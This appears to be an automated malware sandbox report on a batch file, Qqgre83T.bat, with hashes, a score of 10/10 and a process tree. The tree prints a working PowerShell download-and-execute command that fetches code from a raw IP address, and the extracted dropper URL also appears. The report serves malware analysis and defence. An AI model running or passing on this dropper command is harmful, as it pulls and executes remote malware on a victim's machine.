Analysis
-
max time kernel
103s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200217 -
submitted
21-02-2020 16:10
General
-
Target
Qqgre83T.bat
-
Size
197B
-
MD5
23fb28ede9070f21977214722b7b46fe
-
SHA1
f81fbe696a0abdcf0e314125ed1aaf8779feff0d
-
SHA256
552e2dd699f7eb32c4ce0dc9dd35616b783cdf3fcb391b01b0422e2ad98a8a45
-
SHA512
dcd01869d9bd74264aba08b5c66f7a94b3c5513f0e713fdd3d596e1ed6cb43582c184d39ca9f78a6d23814a96535a5ef294f97c42594e10b7546d38e2f0cc4ac
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/Qqgre83T
Signatures
-
Program crash 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Qqgre83T.bat"1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Qqgre83T');Invoke-YKWELITCAXKXYN;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB